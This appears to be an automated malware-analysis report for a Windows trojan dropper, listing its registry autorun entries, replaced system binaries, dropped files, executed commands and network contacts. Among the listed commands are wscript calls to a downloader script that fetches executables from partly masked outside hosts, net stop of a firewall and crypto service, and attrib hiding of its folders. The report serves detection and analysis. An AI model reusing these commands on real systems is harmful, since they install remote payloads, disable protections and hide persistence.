Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'notepax.exe' = '%WINDIR%\notepax.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\ClipSrv] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\CiSvc] 'Start' = '00000002'
- <SYSTEM32>\cisvc.exe with <SYSTEM32>\cisvc1.exe
- <SYSTEM32>\dllcache\cisvc.exe with <SYSTEM32>\dllcache\cisvc1.exe
- <SYSTEM32>\clipsrv.exe with <SYSTEM32>\clipsrv1.exe
- <SYSTEM32>\dllcache\clipsrv.exe with <SYSTEM32>\dllcache\clipsrv1.exe
- '%TEMP%\IXP000.TMP\notepa.exe'
- '%TEMP%\svchst.exe'
- '%TEMP%\svchost.exe'
- '%TEMP%\IXP000.TMP\svcoht.exe'
- '%PROGRAM_FILES%\xerox\nwwia\svchost.exe'
- '%PROGRAM_FILES%\xerox\wupdmgr.exe'
- '%TEMP%\svchost.exe' (downloaded from the Internet)
- '%TEMP%\svchst.exe' (downloaded from the Internet)
- '<SYSTEM32>\find.exe' "Reply from"
- '<SYSTEM32>\taskkill.exe' /f /im clipsrv.exe
- '%WINDIR%\regedit.exe' /s winrp.reg
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox\*.*"
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox"
- '<SYSTEM32>\ping.exe' www.google.com
- '%WINDIR%\regedit.exe' /s wi.reg
- '<SYSTEM32>\cmd.exe' /c %TEMP%\260937.bat
- '<SYSTEM32>\wscript.exe' "%PROGRAM_FILES%\xerox\nwwia\donw.vbs" http://ta####ns.gicp.net/admin/Images/200899172011616.Css %TEMP%\svchost.exe
- '<SYSTEM32>\wscript.exe' "%PROGRAM_FILES%\xerox\nwwia\donw.vbs" http://ki###f.3322.org/uploadfile/swf/2008-9/200899172011699.swf %TEMP%\svchst.exe
- '<SYSTEM32>\ping.exe' 127.1 -n 10
- '<SYSTEM32>\taskkill.exe' /f /im wupdmgr.exe
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox\nwwia\*.*"
- '<SYSTEM32>\net.exe' stop kpfwsvc
- '<SYSTEM32>\net1.exe' stop kpfwsvc
- '<SYSTEM32>\net.exe' stop clipsrv
- '<SYSTEM32>\cmd.exe' /c %TEMP%\127093.bat
- '<SYSTEM32>\net.exe' stop cryptsvc
- '<SYSTEM32>\net1.exe' stop cryptsvc
- '<SYSTEM32>\cmd.exe' /c %TEMP%\178609.bat
- '<SYSTEM32>\taskkill.exe' /f /im cisvc.exe
- '<SYSTEM32>\attrib.exe' +s +h +R "%PROGRAM_FILES%\xerox\nwwia"
- '<SYSTEM32>\net1.exe' stop clipsrv
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\shijian.vbs"
- '%WINDIR%\regedit.exe' /s winr.reg
- <SYSTEM32>\dllcache\cisvc1.exe
- %TEMP%\svchst.exe
- <SYSTEM32>\dllcache\clipsrv1.exe
- <SYSTEM32>\cisvc1.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\200899172011699[1].swf
- %TEMP%\178609.bat
- %WINDIR%\notepax.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\windowsupdate.microsoft[1]
- %PROGRAM_FILES%\xerox\wupdmgr.exe
- %TEMP%\260937.bat
- %WINDIR%\tangnop.exe
- %TEMP%\svchost.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\2VAZY7AN\200899172011616[1].css
- %WINDIR%\tangnox.htm
- %WINDIR%\nox.exe
- <SYSTEM32>\clipsrv1.exe
- %WINDIR%\GetUrl.htm
- %WINDIR%\nox1.exe
- %PROGRAM_FILES%\xerox\nwwia\donw.vbs
- %TEMP%\IXP000.TMP\nox1.exe
- %TEMP%\IXP000.TMP\notepax.exe
- %TEMP%\IXP000.TMP\shijian.vbs
- %TEMP%\IXP000.TMP\nox.exe
- %TEMP%\IXP000.TMP\notepa.exe
- %TEMP%\IXP000.TMP\clipsrv1.exe
- %TEMP%\IXP000.TMP\cisvc1.exe
- %TEMP%\IXP000.TMP\GetUrl.htm
- %TEMP%\IXP000.TMP\donw.vbs
- %TEMP%\IXP000.TMP\winrp.reg
- %TEMP%\IXP000.TMP\winr.reg
- %PROGRAM_FILES%\xerox\nwwia\svchost.exe
- %TEMP%\127093.bat
- %TEMP%\IXP000.TMP\wi.reg
- %TEMP%\IXP000.TMP\svcoht.exe
- %TEMP%\IXP000.TMP\svchost.exe
- %TEMP%\IXP000.TMP\tangnox.htm
- %TEMP%\IXP000.TMP\tangnop.exe
- %PROGRAM_FILES%\xerox\wupdmgr.exe
- %PROGRAM_FILES%\xerox\nwwia\svchost.exe
- %PROGRAM_FILES%\xerox\nwwia\donw.vbs
- %TEMP%\IXP000.TMP\nox1.exe
- %TEMP%\IXP000.TMP\notepax.exe
- %TEMP%\IXP000.TMP\nox.exe
- %TEMP%\IXP000.TMP\svcoht.exe
- %TEMP%\IXP000.TMP\shijian.vbs
- %TEMP%\IXP000.TMP\notepa.exe
- %TEMP%\IXP000.TMP\cisvc1.exe
- %TEMP%\178609.bat
- %TEMP%\IXP000.TMP\clipsrv1.exe
- %TEMP%\IXP000.TMP\GetUrl.htm
- %TEMP%\IXP000.TMP\donw.vbs
- <SYSTEM32>\dllcache\clipsrv.exe
- <SYSTEM32>\clipsrv.exe
- <SYSTEM32>\cisvc.exe
- %TEMP%\IXP000.TMP\svchost.exe
- <SYSTEM32>\dllcache\cisvc.exe
- %PROGRAM_FILES%\xerox\wupdmgr.exe
- %TEMP%\IXP000.TMP\tangnox.htm
- %TEMP%\IXP000.TMP\tangnop.exe
- %TEMP%\IXP000.TMP\wi.reg
- %TEMP%\IXP000.TMP\winrp.reg
- %TEMP%\IXP000.TMP\winr.reg
- 'ki###f.3322.org':80
- 'localhost':1043
- 'ta####ns.gicp.net':80
- 'localhost':1037
- 'localhost':1039
- '20#.#6.232.182':80
- ta####ns.gicp.net/admin/images/200899172011616.css
- ki###f.3322.org/uploadfile/swf/2008-9/200899172011699.swf
- 20#.#6.232.182/
- DNS ASK ki###f.3322.org
- DNS ASK ta####ns.gicp.net
- DNS ASK www.google.com
- DNS ASK windowsupdate.microsoft.com
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'
- ClassName: '(null)' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'